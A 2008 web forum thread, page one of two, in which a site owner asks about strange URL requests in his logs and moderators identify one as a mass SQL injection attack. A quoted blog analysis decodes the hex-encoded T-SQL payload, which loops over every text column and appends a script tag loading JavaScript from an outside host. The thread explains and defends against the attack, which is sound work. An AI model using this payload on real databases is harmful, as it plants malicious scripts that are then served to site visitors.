Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 Community Forums
 Community Discussions (All other subjects)
 URL puzzle
 New Topic  Reply to Topic
 Printer Friendly
Next Page
Author Previous Topic Topic Next Topic
Page: of 2

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 02 February 2008 :  08:32:24  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
One of my sites uses Fullxml which is perfect for the job. This week I have noticed a handful of strange url requests to the site like this

default.asp?id=28&mnu=http://www.domain.co.uk/forum/lovuqo/zil/&

I'm puzzled as to why someone is accessing the site by adding the http bit to the normal url. There are a few of these and they are all different.
<

Martin
Leyland Forum Leyland Lancashire UK

Podge
Support Moderator

Ireland
3775 Posts

Posted - 02 February 2008 :  09:07:17  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
Maybe they are redirecting traffic and are trying to mask the destination? A bit like the way spammers use tinyurl ?<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 02 February 2008 :  09:31:26  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
Hi Podge

The link doesn't redirect, it just displays the page in the normal way.<

Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts

Posted - 02 February 2008 :  09:43:31  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
I don't know what they are doing then. Is this the url - http:/www.fabcraft.co.uk/forum/lovuqo/zil/&page=402<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

MarcelG
Retired Support Moderator

Netherlands
2625 Posts

Posted - 02 February 2008 :  09:49:18  Show Profile  Visit MarcelG's Homepage  Reply with Quote
THey may be trying to pass wrong values to your code, in an effort to hack your site.
I've seen similar attempts on oxle.com, where they try to insert PHP scripts....with no succes of course.<

portfolio - linkshrinker - oxle - twitter
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 02 February 2008 :  10:05:06  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
That's one of the sites. I think they are all the same people though

I have been getting more spam on my guestbook recently. It seems to come in waves, it will be quiet for a few months then lots of activity.

<

Martin
Leyland Forum Leyland Lancashire UK

Edited by - Mr Pink on 02 February 2008 10:07:42
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 04 March 2008 :  15:47:53  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
Today I found this. Looks like a new method of doing something, but what is it?

default.asp?id=0&ACT=7&page=17 Result: using proxy 97.81.19.227:8080;GET-timeouts 2;POST-timeouts 1;chosen nickname "frontivillete";captcha recognized;sent;&<

Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 13 May 2008 :  08:29:55  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
default.asp?id=2&mnu=2;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045

Does anyone know what the above inserted into a url will do?
<

Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page

AnonJr
Moderator

United States
5768 Posts

Posted - 13 May 2008 :  09:18:22  Show Profile  Visit AnonJr's Homepage  Reply with Quote
Off the top of my head it looks like its trying to inject some SQL, but I couldn't say for sure what its specifically trying to do. If you sanitize your query strings properly I don't think its anything to worry about. But I'd get a second opinion on that. <
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts

Posted - 13 May 2008 :  09:24:12  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
Its part of a mass sql injection attack - http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

quote:
This looks a little complicated but, if we remove the encoding, we get this:

DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000));
EXEC(@S);--

So, here's what this little bit of T-SQL is doing:

Declaring a variable, S, as an NVARCHAR. For those of us who don't speak T-SQL natively, think of this as a string.
Taking a long hex value (I took out a few hundred characters where the ... is there) that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we're taking this hex representation of a string and turning it into a real string.
Once that's done, we execute that string as a T-SQL statement.
So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This one is a little more complicated but it does something like this:

Declare a few variables that are used later.
Do a SQL query on the sysobjects and syscolumns tables. This is some serious mojo as these tables contain a list of ALL the tables and ALL the columns in the database. What this query is looking for is every column in the entire database with a type that contains strings.
Now, we're going to loop through all of those columns and, in every one of them...
...we're going to append the <script>...</script> text.
Finally, clean up and we're done.
Now that this has run, every bit of text in your database has this malicious script tag appended to it. If you're using that database to contain text/HTML that you're going to insert into your webpages and display to your users, you are now serving up a malicious script to every one of your trusting customers.


<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts

Posted - 13 May 2008 :  09:29:10  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE

Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.

http://www.string-functions.com/hex-string.aspx<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.

Edited by - Podge on 13 May 2008 09:29:39
Go to Top of Page

AnonJr
Moderator

United States
5768 Posts

Posted - 13 May 2008 :  10:06:19  Show Profile  Visit AnonJr's Homepage  Reply with Quote
I just learned something new. I would have never thought of someone encoding the string like that.

Thanks for that Podge. <
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts

Posted - 13 May 2008 :  10:17:33  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
Its nothing new. Hackers are always trying to disguise what they are doing.

I heard about it from SSWUG a few weeks ago - http://www.sswug.org<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 13 May 2008 :  10:48:13  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
quote:
Originally posted by Podge

0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE

Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.

http://www.string-functions.com/hex-string.aspx



There is my own url on the end of it, that's all<

Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page

Podge
Support Moderator

Ireland
3775 Posts

Posted - 13 May 2008 :  11:24:41  Show Profile  Send Podge an ICQ Message  Send Podge a Yahoo! Message  Reply with Quote
It doesn't look like there a lot of support for FullXml anymore. You might want to ask if there are any security issues on their forum - http://sourceforge.net/forum/forum.php?forum_id=118410<

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.
Go to Top of Page

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 13 May 2008 :  13:32:08  Show Profile  Visit Mr Pink's Homepage  Send Mr Pink an AOL message  Reply with Quote
Thanks for the information about the script Podge. Very interesting.

I've been trying to get support for months and have decided to change to another package.<

Martin
Leyland Forum Leyland Lancashire UK
Go to Top of Page
Page: of 2 Previous Topic Topic Next Topic  
Next Page
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.18 seconds. Powered By: Snitz Forums 2000 Version 3.4.07